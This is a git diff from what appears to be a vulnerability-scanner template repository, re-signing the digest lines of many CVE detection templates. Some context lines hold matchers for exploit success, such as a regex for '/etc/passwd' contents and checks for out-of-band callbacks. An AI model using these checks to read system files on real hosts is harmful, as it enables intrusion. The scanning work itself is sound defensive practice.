http/cves/2024/CVE-2024-5910.yaml | 2 +- http/cves/2024/CVE-2024-5932.yaml | 2 +- http/cves/2024/CVE-2024-5936.yaml | 2 +- http/cves/2024/CVE-2024-5947.yaml | 2 +- http/cves/2024/CVE-2024-6028.yaml | 2 +- http/cves/2024/CVE-2024-6049.yaml | 2 +- http/cves/2024/CVE-2024-6159.yaml | 2 +- http/cves/2024/CVE-2024-6289.yaml | 2 +- http/cves/2024/CVE-2024-6366.yaml | 2 +- http/cves/2024/CVE-2024-6396.yaml | 2 +- http/cves/2024/CVE-2024-6420.yaml | 2 +- http/cves/2024/CVE-2024-6517.yaml | 2 +- http/cves/2024/CVE-2024-6555.yaml | 2 +- http/cves/2024/CVE-2024-6586.yaml | 2 +- http/cves/2024/CVE-2024-6646.yaml | 2 +- http/cves/2024/CVE-2024-6651.yaml | 2 +- http/cves/2024/CVE-2024-6690.yaml | 2 +- http/cves/2024/CVE-2024-6746.yaml | 2 +- http/cves/2024/CVE-2024-6753.yaml | 2 +- http/cves/2024/CVE-2024-6842.yaml | 2 +- http/cves/2024/CVE-2024-6886.yaml | 2 +- http/cves/2024/CVE-2024-6892.yaml | 2 +- http/cves/2024/CVE-2024-6922.yaml | 2 +- http/cves/2024/CVE-2024-6926.yaml | 2 +- http/cves/2024/CVE-2024-7008.yaml | 2 +- http/cves/2024/CVE-2024-7097.yaml | 2 +- http/cves/2024/CVE-2024-7120.yaml | 2 +- http/cves/2024/CVE-2024-7339.yaml | 2 +- http/cves/2024/CVE-2024-7354.yaml | 2 +- http/cves/2024/CVE-2024-7399.yaml | 2 +- http/cves/2024/CVE-2024-7591.yaml | 2 +- http/cves/2024/CVE-2024-7593.yaml | 2 +- http/cves/2024/CVE-2024-7714.yaml | 2 +- http/cves/2024/CVE-2024-7786.yaml | 2 +- http/cves/2024/CVE-2024-7854.yaml | 2 +- http/cves/2024/CVE-2024-7928.yaml | 2 +- http/cves/2024/CVE-2024-8021.yaml | 2 +- http/cves/2024/CVE-2024-8484.yaml | 2 +- http/cves/2024/CVE-2024-8517.yaml | 2 +- http/cves/2024/CVE-2024-8522.yaml | 2 +- http/cves/2024/CVE-2024-8529.yaml | 2 +- http/cves/2024/CVE-2024-8698.yaml | 2 +- http/cves/2024/CVE-2024-8752.yaml | 2 +- http/cves/2024/CVE-2024-8856.yaml | 2 +- http/cves/2024/CVE-2024-8859.yaml | 2 +- http/cves/2024/CVE-2024-8877.yaml | 2 +- http/cves/2024/CVE-2024-8883.yaml | 2 +- http/cves/2024/CVE-2024-9007.yaml | 2 +- http/cves/2024/CVE-2024-9047.yaml | 2 +- http/cves/2024/CVE-2024-9161.yaml | 2 +- http/cves/2024/CVE-2024-9166.yaml | 2 +- http/cves/2024/CVE-2024-9186.yaml | 2 +- http/cves/2024/CVE-2024-9463.yaml | 2 +- http/cves/2024/CVE-2024-9474.yaml | 2 +- http/cves/2024/CVE-2024-9772.yaml | 2 +- http/cves/2024/CVE-2024-9989.yaml | 2 +- http/cves/2025/CVE-2025-0107.yaml | 2 +- http/cves/2025/CVE-2025-0108.yaml | 2 +- http/cves/2025/CVE-2025-0133.yaml | 2 +- http/cves/2025/CVE-2025-0674.yaml | 2 +- http/cves/2025/CVE-2025-0868.yaml | 2 +- http/cves/2025/CVE-2025-10210.yaml | 2 +- http/cves/2025/CVE-2025-10211.yaml | 2 +- http/cves/2025/CVE-2025-1023.yaml | 2 +- http/cves/2025/CVE-2025-1035.yaml | 2 +- http/cves/2025/CVE-2025-1097.yaml | 2 +- http/cves/2025/CVE-2025-1098.yaml | 2 +- http/cves/2025/CVE-2025-11307.yaml | 2 +- http/cves/2025/CVE-2025-11371.yaml | 2 +- http/cves/2025/CVE-2025-11749.yaml | 2 +- http/cves/2025/CVE-2025-11833.yaml | 2 +- http/cves/2025/CVE-2025-12055.yaml | 2 +- http/cves/2025/CVE-2025-12139.yaml | 2 +- http/cves/2025/CVE-2025-12480.yaml | 2 +- http/cves/2025/CVE-2025-1323.yaml | 2 +- http/cves/2025/CVE-2025-1562.yaml | 2 +- http/cves/2025/CVE-2025-1743.yaml | 2 +- http/cves/2025/CVE-2025-1974.yaml | 2 +- http/cves/2025/CVE-2025-2010.yaml | 2 +- http/cves/2025/CVE-2025-2011.yaml | 2 +- http/cves/2025/CVE-2025-20188.yaml | 2 +- http/cves/2025/CVE-2025-20281.yaml | 2 +- http/cves/2025/CVE-2025-20362.yaml | 2 +- http/cves/2025/CVE-2025-2075.yaml | 2 +- http/cves/2025/CVE-2025-2127.yaml | 2 +- http/cves/2025/CVE-2025-2129.yaml | 2 +- http/cves/2025/CVE-2025-2294.yaml | 2 +- http/cves/2025/CVE-2025-23061.yaml | 2 +- http/cves/2025/CVE-2025-24016.yaml | 2 +- http/cves/2025/CVE-2025-24354.yaml | 2 +- http/cves/2025/CVE-2025-24514.yaml | 2 +- http/cves/2025/CVE-2025-2473.yaml | 2 +- http/cves/2025/CVE-2025-24799.yaml | 2 +- http/cves/2025/CVE-2025-24893.yaml | 2 +- http/cves/2025/CVE-2025-24963.yaml | 2 +- http/cves/2025/CVE-2025-25037.yaml | 2 +- http/cves/2025/CVE-2025-25257.yaml | 2 +- http/cves/2025/CVE-2025-25570.yaml | 2 +- http/cves/2025/CVE-2025-2563.yaml | 2 +- http/cves/2025/CVE-2025-2610.yaml | 2 +- http/cves/2025/CVE-2025-26319.yaml | 2 +- http/cves/2025/CVE-2025-2636.yaml | 2 +- http/cves/2025/CVE-2025-26793.yaml | 2 +- http/cves/2025/CVE-2025-27007.yaml | 2 +- http/cves/2025/CVE-2025-2709.yaml | 2 +- http/cves/2025/CVE-2025-2710.yaml | 2 +- http/cves/2025/CVE-2025-2711.yaml | 2 +- http/cves/2025/CVE-2025-27112.yaml | 2 +- http/cves/2025/CVE-2025-2712.yaml | 2 +- http/cves/2025/CVE-2025-27134.yaml | 2 +- http/cves/2025/CVE-2025-27218.yaml | 2 +- http/cves/2025/CVE-2025-27225.yaml | 2 +- http/cves/2025/CVE-2025-2748.yaml | 2 +- http/cves/2025/CVE-2025-27505.yaml | 2 +- http/cves/2025/CVE-2025-2775.yaml | 2 +- http/cves/2025/CVE-2025-2776.yaml | 2 +- http/cves/2025/CVE-2025-2777.yaml | 2 +- http/cves/2025/CVE-2025-27888.yaml | 2 +- http/cves/2025/CVE-2025-27892.yaml | 2 +- http/cves/2025/CVE-2025-27915.yaml | 2 +- http/cves/2025/CVE-2025-28228.yaml | 2 +- http/cves/2025/CVE-2025-28367.yaml | 2 +- http/cves/2025/CVE-2025-28906.yaml | 2 +- http/cves/2025/CVE-2025-29927.yaml | 2 +- http/cves/2025/CVE-2025-30406.yaml | 2 +- http/cves/2025/CVE-2025-30567.yaml | 2 +- http/cves/2025/CVE-2025-31131.yaml | 2 +- http/cves/2025/CVE-2025-31324.yaml | 2 +- http/cves/2025/CVE-2025-31486.yaml | 2 +- http/cves/2025/CVE-2025-31489.yaml | 2 +- http/cves/2025/CVE-2025-32429.yaml | 2 +- http/cves/2025/CVE-2025-32430.yaml | 2 +- http/cves/2025/CVE-2025-32432.yaml | 2 +- http/cves/2025/CVE-2025-3248.yaml | 2 +- http/cves/2025/CVE-2025-32813.yaml | 2 +- http/cves/2025/CVE-2025-32814.yaml | 2 +- http/cves/2025/CVE-2025-32815.yaml | 2 +- http/cves/2025/CVE-2025-32969.yaml | 2 +- http/cves/2025/CVE-2025-34023.yaml | 2 +- http/cves/2025/CVE-2025-34026.yaml | 2 +- http/cves/2025/CVE-2025-34028.yaml | 2 +- http/cves/2025/CVE-2025-34031.yaml | 2 +- http/cves/2025/CVE-2025-34032.yaml | 2 +- http/cves/2025/CVE-2025-34035.yaml | 2 +- http/cves/2025/CVE-2025-34077.yaml | 2 +- http/cves/2025/CVE-2025-34141.yaml | 2 +- http/cves/2025/CVE-2025-34143.yaml | 2 +- http/cves/2025/CVE-2025-3415.yaml | 2 +- http/cves/2025/CVE-2025-34291.yaml | 2 +- http/cves/2025/CVE-2025-34299.yaml | 2 +- http/cves/2025/CVE-2025-34509.yaml | 2 +- http/cves/2025/CVE-2025-3472.yaml | 2 +- http/cves/2025/CVE-2025-3605.yaml | 2 +- http/cves/2025/CVE-2025-36604.yaml | 2 +- http/cves/2025/CVE-2025-4008.yaml | 2 +- http/cves/2025/CVE-2025-4009.yaml | 2 +- http/cves/2025/CVE-2025-40630.yaml | 2 +- http/cves/2025/CVE-2025-4123.yaml | 2 +- http/cves/2025/CVE-2025-41393.yaml | 2 +- http/cves/2025/CVE-2025-41646.yaml | 2 +- http/cves/2025/CVE-2025-4210.yaml | 2 +- http/cves/2025/CVE-2025-4302.yaml | 2 +- http/cves/2025/CVE-2025-4380.yaml | 2 +- http/cves/2025/CVE-2025-4388.yaml | 2 +- http/cves/2025/CVE-2025-4396.yaml | 2 +- http/cves/2025/CVE-2025-44136.yaml | 2 +- http/cves/2025/CVE-2025-44137.yaml | 2 +- http/cves/2025/CVE-2025-44148.yaml | 2 +- http/cves/2025/CVE-2025-44177.yaml | 2 +- http/cves/2025/CVE-2025-4427.yaml | 2 +- http/cves/2025/CVE-2025-45854.yaml | 2 +- http/cves/2025/CVE-2025-45985.yaml | 2 +- http/cves/2025/CVE-2025-4632.yaml | 2 +- http/cves/2025/CVE-2025-46349.yaml | 2 +- http/cves/2025/CVE-2025-46550.yaml | 2 +- http/cves/2025/CVE-2025-46822.yaml | 2 +- http/cves/2025/CVE-2025-47204.yaml | 2 +- http/cves/2025/CVE-2025-47423.yaml | 2 +- http/cves/2025/CVE-2025-47539.yaml | 2 +- http/cves/2025/CVE-2025-47646.yaml | 2 +- http/cves/2025/CVE-2025-47812.yaml | 2 +- http/cves/2025/CVE-2025-47813.yaml | 2 +- http/cves/2025/CVE-2025-48703.yaml | 2 +- http/cves/2025/CVE-2025-48828.yaml | 2 +- http/cves/2025/CVE-2025-48954.yaml | 2 +- http/cves/2025/CVE-2025-49029.yaml | 2 +- http/cves/2025/CVE-2025-49113.yaml | 2 +- http/cves/2025/CVE-2025-49493.yaml | 2 +- http/cves/2025/CVE-2025-49596.yaml | 2 +- http/cves/2025/CVE-2025-49706.yaml | 2 +- http/cves/2025/CVE-2025-49825.yaml | 2 +- http/cves/2025/CVE-2025-5086.yaml | 2 +- http/cves/2025/CVE-2025-51482.yaml | 2 +- http/cves/2025/CVE-2025-51991.yaml | 2 +- http/cves/2025/CVE-2025-52207.yaml | 2 +- http/cves/2025/CVE-2025-52472.yaml | 2 +- http/cves/2025/CVE-2025-52488.yaml | 2 +- http/cves/2025/CVE-2025-52665.yaml | 2 +- http/cves/2025/CVE-2025-5287.yaml | 2 +- http/cves/2025/CVE-2025-52970.yaml | 2 +- http/cves/2025/CVE-2025-5301.yaml | 2 +- http/cves/2025/CVE-2025-53770.yaml | 2 +- http/cves/2025/CVE-2025-53771.yaml | 2 +- http/cves/2025/CVE-2025-53833.yaml | 2 +- http/cves/2025/CVE-2025-54251.yaml | 2 +- http/cves/2025/CVE-2025-54589.yaml | 2 +- http/cves/2025/CVE-2025-54782.yaml | 2 +- http/cves/2025/CVE-2025-55161.yaml | 2 +- http/cves/2025/CVE-2025-55182.yaml | 2 +- http/cves/2025/CVE-2025-5569.yaml | 2 +- http/cves/2025/CVE-2025-55748.yaml | 2 +- http/cves/2025/CVE-2025-55749.yaml | 2 +- http/cves/2025/CVE-2025-56819.yaml | 2 +- http/cves/2025/CVE-2025-5701.yaml | 2 +- http/cves/2025/CVE-2025-5777.yaml | 2 +- http/cves/2025/CVE-2025-57819.yaml | 2 +- http/cves/2025/CVE-2025-57822.yaml | 2 +- http/cves/2025/CVE-2025-58179.yaml | 2 +- http/cves/2025/CVE-2025-58434.yaml | 2 +- http/cves/2025/CVE-2025-58443.yaml | 2 +- http/cves/2025/CVE-2025-58751.yaml | 2 +- http/cves/2025/CVE-2025-59049.yaml | 2 +- http/cves/2025/CVE-2025-59287.yaml | 2 +- http/cves/2025/CVE-2025-5961.yaml | 2 +- http/cves/2025/CVE-2025-6058.yaml | 2 +- http/cves/2025/CVE-2025-6174.yaml | 2 +- http/cves/2025/CVE-2025-61884.yaml | 2 +- http/cves/2025/CVE-2025-6204.yaml | 2 +- http/cves/2025/CVE-2025-6205.yaml | 2 +- http/cves/2025/CVE-2025-63387.yaml | 2 +- http/cves/2025/CVE-2025-6403.yaml | 2 +- http/cves/2025/CVE-2025-66472.yaml | 2 +- http/cves/2025/CVE-2025-6851.yaml | 2 +- http/cves/2025/CVE-2025-68613.yaml | 2 +- http/cves/2025/CVE-2025-69200.yaml | 2 +- http/cves/2025/CVE-2025-6970.yaml | 2 +- http/cves/2025/CVE-2025-7160.yaml | 2 +- http/cves/2025/CVE-2025-8848.yaml | 2 +- http/cves/2025/CVE-2025-8868.yaml | 2 +- http/cves/2025/CVE-2025-8943.yaml | 2 +- http/cves/2025/CVE-2025-9196.yaml | 2 +- http/cves/2025/CVE-2025-9744.yaml | 2 +- http/cves/2026/CVE-2026-21858.yaml | 2 +- http/misconfiguration/kanboard-database-exposure.yaml | 1 + http/vulnerabilities/yonyou/yonyou-nc-lfi.yaml | 2 +- javascript/cves/2012/CVE-2012-2122.yaml | 2 +- javascript/cves/2016/CVE-2016-8706.yaml | 2 +- javascript/cves/2018/CVE-2018-8011.yaml | 2 +- javascript/cves/2019/CVE-2019-6443.yaml | 2 +- javascript/cves/2019/CVE-2019-9193.yaml | 2 +- javascript/cves/2021/CVE-2021-35394.yaml | 2 +- javascript/cves/2021/CVE-2021-36754.yaml | 2 +- javascript/cves/2023/CVE-2023-34039.yaml | 2 +- javascript/cves/2023/CVE-2023-46604.yaml | 2 +- javascript/cves/2023/CVE-2023-48795.yaml | 2 +- network/cves/2001/CVE-2001-1473.yaml | 2 +- network/cves/2004/CVE-2004-0437.yaml | 2 +- network/cves/2004/CVE-2004-0656.yaml | 2 +- network/cves/2004/CVE-2004-1602.yaml | 2 +- network/cves/2004/CVE-2004-1641.yaml | 2 +- network/cves/2004/CVE-2004-2687.yaml | 2 +- network/cves/2005/CVE-2005-0850.yaml | 2 +- network/cves/2005/CVE-2005-0851.yaml | 2 +- network/cves/2006/CVE-2006-2173.yaml | 2 +- network/cves/2006/CVE-2006-6565.yaml | 2 +- network/cves/2008/CVE-2008-5281.yaml | 2 +- network/cves/2009/CVE-2009-0884.yaml | 2 +- network/cves/2010/CVE-2010-3867.yaml | 2 +- network/cves/2011/CVE-2011-0762.yaml | 2 +- network/cves/2011/CVE-2011-3171.yaml | 2 +- network/cves/2014/CVE-2014-1842.yaml | 2 +- network/cves/2014/CVE-2014-1843.yaml | 2 +- network/cves/2016/CVE-2016-2004.yaml | 2 +- network/cves/2016/CVE-2016-3510.yaml | 2 +- network/cves/2017/CVE-2017-5645.yaml | 2 +- network/cves/2019/CVE-2019-20176.yaml | 2 +- network/cves/2020/CVE-2020-0796.yaml | 2 +- network/cves/2020/CVE-2020-14644.yaml | 2 +- network/cves/2020/CVE-2020-1938.yaml | 2 +- network/cves/2020/CVE-2020-35359.yaml | 2 +- network/cves/2020/CVE-2020-9274.yaml | 2 +- network/cves/2021/CVE-2021-27877.yaml | 2 +- network/cves/2021/CVE-2021-30047.yaml | 2 +- network/cves/2021/CVE-2021-40524.yaml | 2 +- network/cves/2022/CVE-2022-24706.yaml | 2 +- network/cves/2023/CVE-2023-37582.yaml | 2 +- network/cves/2023/CVE-2023-48788.yaml | 2 +- network/cves/2024/CVE-2024-23108.yaml | 2 +- network/cves/2024/CVE-2024-48651.yaml | 2 +- network/cves/2025/CVE-2025-25256.yaml | 2 +- network/cves/2025/CVE-2025-47188.yaml | 2 +- network/cves/2025/CVE-2025-8286.yaml | 2 +- network/detection/unauth-java-message-broker-detect.yaml | 2 +- 2247 files changed, 2247 insertions(+), 2246 deletions(-) diff --git a/code/cves/2014/CVE-2014-0160.yaml b/code/cves/2014/CVE-2014-0160.yaml index 7a688fd51c5..1a2edde6c21 100644 --- a/code/cves/2014/CVE-2014-0160.yaml +++ b/code/cves/2014/CVE-2014-0160.yaml @@ -142,4 +142,4 @@ code: - type: dsl dsl: - "contains(response,'server is vulnerable')" -# digest: 4b0a00483046022100b436f195027bee97d8fcd6f4ce6891122a37062acee6c86a62ef9fe7822dc81d0221008b13457977e0b7019a8bb7f1014157f889ad44a6a8a4131b269d78add72a7697:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a00473045022033dcc1bd41fab7a07502c9522a73746913e4dbc921ff2024007f0b8e9c4322dd022100d88ffc2571186e14a29191337f1fe763d876aceb8493d1a751216d39f3c87506:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/code/cves/2019/CVE-2019-0604.yaml b/code/cves/2019/CVE-2019-0604.yaml index 09231e4b7e0..1315e887962 100644 --- a/code/cves/2019/CVE-2019-0604.yaml +++ b/code/cves/2019/CVE-2019-0604.yaml @@ -156,4 +156,4 @@ code: - 'contains(interactsh_protocol, "dns")' - 'contains(interactsh_request, hex_encode(marker))' condition: and -# digest: 4a0a00473045022100e3197ee26d9a33ce29fd4c4d0641965e50f542e4fb7bb0f5ba6941627d2dcf0502201f3daf9691d36d40df94de608d0e527a506b79315ccff56abb94fe6d8df1446e:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4b0a00483046022100952afb1c63a586fdef232995412224f28ac22c23ca61265c82e4372457657d44022100d612f97e3e440a7ee9483bfe800f59a5049f2dc70fef178d85cfffd8c17e57af:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/code/cves/2019/CVE-2019-14287.yaml b/code/cves/2019/CVE-2019-14287.yaml index ce46a51af66..5edea1c7afa 100644 --- a/code/cves/2019/CVE-2019-14287.yaml +++ b/code/cves/2019/CVE-2019-14287.yaml @@ -51,4 +51,4 @@ code: - '!contains(code_1_response, "root")' - 'contains(code_2_response, "root")' condition: and -# digest: 4a0a00473045022100ea14f2903512a3829e07c73e35adee5086020b51234e0821d96866817999176f022046521ba2c2e6a6518d383a155229e4c1a51fa4e8784f2ac628019213f8dd53ae:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4b0a004830460221008cb53d38399926178dc73052a6647638ac88242b5d283c69c86b34461de28341022100c3bfea0a4a0675ff2b063a5dde56b97d9f0120588e2e1c77aefa559897a52314:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/code/cves/2021/CVE-2021-3156.yaml b/code/cves/2021/CVE-2021-3156.yaml index 972253257c7..45c205e904c 100644 --- a/code/cves/2021/CVE-2021-3156.yaml +++ b/code/cves/2021/CVE-2021-3156.yaml @@ -44,4 +44,4 @@ code: - "malloc(): memory corruption" - "Aborted (core dumped)" condition: and -# digest: 4a0a00473045022100df41969d1eb04a36213550eb3ec688d09e48bea77cc6b968b8bb43e732d004d7022063fd6cc37523b825e21ca6fb1de39f9c4acb317388e03e9777d0e959a8df0b2f:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 490a0046304402201ecba708548937926174e95fe05e2a775657f2cc4cbef07bde7bb85b1ac70e6b02205683e4a72df84e23a42015d9b1eafb18338f471bc96660f21f70f17a73a77494:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/code/cves/2022/CVE-2022-42475.yaml b/code/cves/2022/CVE-2022-42475.yaml index 855ccaf8edf..b241ec2d205 100644 --- a/code/cves/2022/CVE-2022-42475.yaml +++ b/code/cves/2022/CVE-2022-42475.yaml @@ -199,4 +199,4 @@ code: - type: word words: - "Target appears to be VULNERABLE" -# digest: 4b0a00483046022100b1d6c98e5bfe8e9c1148cabd2c587c079c78e2cf5620290daab2d53e25b8e0f5022100d760d713e1f2de8512fdf6ab34a7d804ef54c0e90502d01810e8a770ad20a98b:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a0047304502200b1f3ce902f1d82e4e464f14ae4e76ac43ed5043f1ea6967edf20cf86cb44042022100d096f5987df23930f4cd360458a418de41733ae276beca94c3623bd2c624de1a:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/code/cves/2023/CVE-2023-2640.yaml b/code/cves/2023/CVE-2023-2640.yaml index 3d83ab12c83..119755edbef 100644 --- a/code/cves/2023/CVE-2023-2640.yaml +++ b/code/cves/2023/CVE-2023-2640.yaml @@ -55,4 +55,4 @@ code: - '!contains(code_1_response, "(root)")' - 'contains(code_2_response, "(root)")' condition: and -# digest: 4a0a00473045022036f53f6f1da2e88e2ffdf8327dd423086baf9a6a9bd2d8e63a447744bcba6bd4022100e98211341607b3aa60fa83717f9502a6330d22dbd56bb100c552b270c6eaf52b:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a0047304502210083c3efd2d812aa511cea0749d7d8c044e2f917b54a80cf2fd2350c9211db40f102205222d154bc771f926ac6064e4ae58bbb3c00b656ea743612fbcca1a237e65353:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/code/cves/2023/CVE-2023-6246.yaml b/code/cves/2023/CVE-2023-6246.yaml index a07c5568477..52b45c1be7a 100644 --- a/code/cves/2023/CVE-2023-6246.yaml +++ b/code/cves/2023/CVE-2023-6246.yaml @@ -43,4 +43,4 @@ code: - type: word words: - "127" # Segmentation Fault Exit Code -# digest: 4b0a00483046022100f3819029d8d67c61ef7f501cc7b2c325e8ebbd7877f76f96f51481bae5d9857d022100deb597c2093e0a2c5873a5460aa52b41d43b29f3e59bb57d9b663ff6e939d53e:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a004730450221009ec5024a5144ad132b2b48b51d8b521e938158cf71e90f8a3b1a67441da4d066022036c4ba4b52648772e20bb6e95e787cf12e1097731273e9a3a27912fce56d40a0:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/code/cves/2024/CVE-2024-22120.yaml b/code/cves/2024/CVE-2024-22120.yaml index 30dfc7fa1f1..e285854cfcc 100644 --- a/code/cves/2024/CVE-2024-22120.yaml +++ b/code/cves/2024/CVE-2024-22120.yaml @@ -73,4 +73,4 @@ code: - type: word words: - "Vulnerable to CVE-2024-22120" -# digest: 4a0a004730450220718d5807505f6031d8b84168dcfe7cc45843b11233283c1405307e2731058c020221008c26a2fad1990c712b921a8ed6ef3b3f9f1637e3948f2e37a307e97e20c3d401:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 490a004630440220014fe88ae9729fd71aa082b06b983f9292f09489e03f3305e61046175501504a02203b70ebea37bcc5c28e6b6a9997a0772439a7c308eb8ddeda5f5cd76763ae1b51:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/code/cves/2024/CVE-2024-55556.yaml b/code/cves/2024/CVE-2024-55556.yaml index 164b7ae5a7b..a1f56931188 100644 --- a/code/cves/2024/CVE-2024-55556.yaml +++ b/code/cves/2024/CVE-2024-55556.yaml @@ -195,4 +195,4 @@ http: - type: status status: - 500 -# digest: 4a0a00473045022100ed32fd616b055f8d766d4bcac36ce388c4dbebde2636e35dc14471ced56be8dc02207afef543411804d2cca2445dafc398b98ee9fa2f49df9f4275b2f47909042f81:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4b0a00483046022100d4d04463b0f2774f3186ca6d5807536116378898205d13e22951fcb4134e8998022100fbf16bc0b5e4acd988dde2a843b7d1bcaee2c7485d6d34c6185a11f1d9bb9ee4:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/code/cves/2024/CVE-2024-56331.yaml b/code/cves/2024/CVE-2024-56331.yaml index 915e6a0abe1..957cf013c80 100644 --- a/code/cves/2024/CVE-2024-56331.yaml +++ b/code/cves/2024/CVE-2024-56331.yaml @@ -124,4 +124,4 @@ code: - type: word words: - "/etc/passwd: {'ok': True, 'msg': 'successAdded'" -# digest: 490a0046304402201fd8dfab4c16e3e8390da0235abcccfdaa425c981b6158af55f0c46830b56e4e0220634c36cb4c986e8553debce5080603139eaa345d7d65fef809c6c0fe3bea0edc:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a00473045022100b622b8e67a521fd3202b4e5163c0e3d47642afa09475a6c094080ad2ea068add0220314a6ba935c99997c6cb38d6c819a247e5f8b2e5c905342e642eaa6e355a11b7:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/code/cves/2024/CVE-2024-9487.yaml b/code/cves/2024/CVE-2024-9487.yaml index f77b6390ef6..38aee29a527 100644 --- a/code/cves/2024/CVE-2024-9487.yaml +++ b/code/cves/2024/CVE-2024-9487.yaml @@ -192,4 +192,4 @@ http: - type: kval kval: - user_session -# digest: 4a0a0047304502207628bc61c34f2efd98459c98735efacf7b79e26a31a5d829be2649dce326c20b0221009687c1c5d717e4ba10c759f03551ccc04e2fc52dfcc89f2b3600a76dc3e82e3c:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 490a0046304402202442211b82eeda1e6db5cbf8353e8b30fb3dbc491f8a516ac4f012cae85c807402201daa8bd0ad0dc1b4416eb24a12d13d052e16cc0e8b5afac4364c5cf01848a334:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/code/cves/2025/CVE-2025-1550.yaml b/code/cves/2025/CVE-2025-1550.yaml index d49e934b044..b49bbb052b1 100644 --- a/code/cves/2025/CVE-2025-1550.yaml +++ b/code/cves/2025/CVE-2025-1550.yaml @@ -77,4 +77,4 @@ code: part: response regex: - "root:.*:0:0:" -# digest: 4a0a0047304502200b3639bf4133444d02527e51a65422d49bfd3c8d83548e80319a56140b5d6a58022100b8c0b3f283adaa6bf284c2f7053351f15a3d06383859401caff96390f8bddea2:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4b0a00483046022100d7aacceffe9cc27a01ac6d826c9a73bfdf4a2c5cf4a310dc290d7b5d88da6dba022100ed714439b5f31a8d421b25a140c6c58ce60a0ee8285868d687776f90e99e30ca:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/code/cves/2025/CVE-2025-22457.yaml b/code/cves/2025/CVE-2025-22457.yaml index 1cf395004c9..78ab5b9722d 100644 --- a/code/cves/2025/CVE-2025-22457.yaml +++ b/code/cves/2025/CVE-2025-22457.yaml @@ -128,4 +128,4 @@ code: - type: word words: - "VULNERABLE:" -# digest: 490a00463044021f137caffecb2ebbe59b0dfa21b5f02060121d17a5c7ad1c84b9e9ee4f077249022100dd9243d3a8d4d3287ea99c4509223bef7034c993bfb38a8fe3b4ab93b610308f:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4b0a0048304602210096af9e8fbf6cd58562e48d5cb575f2409aeb2c2cbca512299090e9a9fca7c620022100bc731ef6b3c0d37713879a186eb144d14855d96310d0a275c2452a4bda2ef4d2:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/code/cves/2025/CVE-2025-25291.yaml b/code/cves/2025/CVE-2025-25291.yaml index 6ac06e33cdc..ae36075e19f 100644 --- a/code/cves/2025/CVE-2025-25291.yaml +++ b/code/cves/2025/CVE-2025-25291.yaml @@ -80,4 +80,4 @@ http: - type: kval kval: - _gitlab_session -# digest: 490a0046304402207a19fcad1d4ae98f91424379377cb153760595f209bd09ec2531c41a1dfd82b3022065b3511407d22367c6a6b14467660afd52cff63993345adbe601f0b1bc04a599:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4b0a00483046022100f7f9988bd17f9e6decb3f5e7f7e5ad09b4790dd8f8061ff099409457f622fbd8022100ecff221250e793a9dbe7270aaf6216cd9a80891082e2fe8967407a632e804a8b:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/code/cves/2025/CVE-2025-32433.yaml b/code/cves/2025/CVE-2025-32433.yaml index ae376982a47..b61c73a212f 100644 --- a/code/cves/2025/CVE-2025-32433.yaml +++ b/code/cves/2025/CVE-2025-32433.yaml @@ -174,4 +174,4 @@ code: dsl: - 'contains(interactsh_protocol, "dns")' condition: and -# digest: 4a0a0047304502202ae0003f29fec76c443d38f3b5af257b9e459c4bed0b2d5ebbbfbdff2de5c8190221008d6cfc163f01528122a82bbaccce4a4879a4721cf1409ae5b84d7cc8a609d811:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a004730450220109b08cf48a70a84e54a0a6bbfe64f552ab7906c9bb06e1aafa8c5e78da00da0022100f6bd576ec142a977e44fbe303cd97957ea8bddb1ebda2a77663970cca1804c1d:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/code/cves/2025/CVE-2025-54309.yaml b/code/cves/2025/CVE-2025-54309.yaml index 9298e1569b3..35c8c2f3e75 100644 --- a/code/cves/2025/CVE-2025-54309.yaml +++ b/code/cves/2025/CVE-2025-54309.yaml @@ -200,4 +200,4 @@ code: - type: word words: - "VULNERABLE:" -# digest: 4a0a004730450221009d18cfec7df4b821d4a71ce251dc0f8d1bde5e2cb1dce945c2ad1a6c9c22fdd502203828ba84ffdc537977fff6152d9522ae2a6feda1208efba556e51ce6468d8dce:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 490a0046304402200ac549f5ef3f5f4a2d75acaf2ad7f6b79d118649d40276e122abebad72cc960d022007c4ed8a72b079569e664317d5f7d0c2879ff6f62a5ab5bcc809e9b1f75d791f:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/dast/cves/2020/CVE-2020-9402.yaml b/dast/cves/2020/CVE-2020-9402.yaml index 6e2a072e23b..29b577d91a3 100644 --- a/dast/cves/2020/CVE-2020-9402.yaml +++ b/dast/cves/2020/CVE-2020-9402.yaml @@ -54,4 +54,4 @@ http: - "ORA-06512:" - "Request Method:" condition: and -# digest: 